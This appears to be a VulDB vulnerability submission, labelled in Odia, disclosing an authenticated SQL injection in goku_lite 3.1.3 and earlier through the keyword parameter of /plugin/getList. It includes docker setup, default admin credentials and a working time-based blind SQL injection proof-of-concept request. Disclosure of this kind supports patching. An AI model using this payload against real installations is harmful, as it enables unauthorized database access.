| ଶୀର୍ଷକ | goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter |
|---|
| ବର୍ଣ୍ଣନା | # Get start
repo: ** https://github.com/eolinker/goku_lite **
- Execute docker command
- Start goku
```bash
docker run
docker run -dt -p 7000:7000
-v /app/goku-ce/work:/app/goku-ce/console/work
-e GOKU_ADMIN_PASSWORD=123456
--network=goku-ce
--ip x.x.x.x
--name goku-ce-console
eolinker/goku-api-gateway-ce-console
```
user/pass:
admin/123456
# vulnerability
goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter
use admin/123456 to login
POC:
Request URL: http://testlink:7000/plugin/getList
Request Method: POST
PostData: keyword=' AND 8247=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- PSdW
Use sqlmap :
Please show QSec-Team in the detail of cve page.
Thanks,
QSec-Team |
|---|
| ଉପଭୋକ୍ତା | qsec (UID 33968) |
|---|
| ଦାଖଲ | 11/11/2022 12:25 PM (3 ବର୍ଷ ବର୍ଷ ago) |
|---|
| ମଧ୍ୟମ ଧରଣର | 11/11/2022 01:14 PM (48 minutes later) |
|---|
| ସ୍ଥିତି | ଗ୍ରହଣ କରାଯାଇଛି |
|---|
| VulDB ଏଣ୍ଟ୍ରି | 213454 [eolinker goku_lite /plugin/getList route/keyword SQL ଇଞ୍ଜେକ୍ସନ] |
|---|
| ପଏଣ୍ଟ | 17 |
|---|